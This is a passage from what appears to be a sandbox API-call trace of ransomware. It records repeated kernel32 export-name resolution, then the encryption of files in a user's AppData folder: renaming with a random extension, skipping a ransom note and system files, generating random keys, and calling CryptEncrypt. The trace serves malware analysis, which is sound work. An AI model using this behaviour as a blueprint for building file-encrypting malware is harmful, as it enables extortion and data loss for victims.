returned="CreateSemaphoreExA" [0076.977] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.977] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.977] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.977] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.977] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.977] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.977] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.977] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.977] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.977] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.977] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.977] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.977] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.977] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.977] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.977] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.977] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.977] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.978] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.978] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.978] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.978] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.978] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.978] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.978] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.978] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.978] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.978] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.978] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.978] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.978] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.978] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.978] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.978] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.978] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.978] lstrlenA (lpString="DELETEATOM") returned 10 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.978] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.979] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.979] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.979] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.979] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.979] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.979] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.979] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.979] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.979] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.979] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.979] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.979] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.979] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.979] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.979] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.979] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.979] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.979] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.979] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.979] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.980] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.980] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.980] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.980] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.980] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.980] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.980] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.980] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.980] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.980] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.980] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.980] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.980] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.980] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.980] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.980] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.980] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.980] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.981] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.981] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.981] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a") returned 61 [0076.981] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a.LjQ5") returned 66 [0076.981] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akdbjfytmat.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a.LjQ5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akdbjfytmat.m4a.ljq5"), dwFlags=0x0) returned 1 [0076.982] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.982] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.982] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.983] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x56decb60, ftCreationTime.dwHighDateTime=0x1d4ceae, ftLastAccessTime.dwLowDateTime=0x6c9c91a0, ftLastAccessTime.dwHighDateTime=0x1d4c65f, ftLastWriteTime.dwLowDateTime=0x6c9c91a0, ftLastWriteTime.dwHighDateTime=0x1d4c65f, nFileSizeHigh=0x0, nFileSizeLow=0x108ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="b5XS GJUXmYXlZvRSW-.mp3", cAlternateFileName="B5XSGJ~1.MP3")) returned 1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="DECRYPT-FILES.txt") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="autorun.inf") returned 1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="boot.ini") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="desktop.ini") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="ntuser.dat") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="iconcache.db") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="bootsect.bak") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="ntuser.dat.log") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="thumbs.db") returned -1 [0076.983] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3", lpString2="Bootfont.bin") returned -1 [0076.983] lstrlenW (lpString="b5XS GJUXmYXlZvRSW-.mp3") returned 23 [0076.983] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0076.983] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0076.983] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0076.984] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0076.984] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.984] lstrlenW (lpString="b5XS GJUXmYXlZvRSW-.mp3") returned 23 [0076.984] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.984] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="b5XS GJUXmYXlZvRSW-.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3" [0076.984] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.984] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b5xs gjuxmyxlzvrsw-.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.984] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=67755) returned 1 [0076.984] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.984] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0076.984] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.984] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.984] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.985] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.985] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0076.986] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.986] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0076.987] CloseHandle (hObject=0x444) returned 1 [0076.987] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.987] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.988] CloseHandle (hObject=0x0) returned 0 [0076.988] CloseHandle (hObject=0x440) returned 1 [0076.989] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.989] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.989] GetTickCount () returned 0x114bc1f [0076.989] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.990] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.990] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.990] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.990] lstrlenA (lpString="kernel32.dll") returned 12 [0076.990] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.990] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.990] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.990] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.991] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.991] lstrlenA (lpString="ADDATOMA") returned 8 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.991] lstrlenA (lpString="ADDATOMW") returned 8 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.991] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.991] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.991] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.991] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.991] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.991] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.991] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.991] lstrcpyA (in: 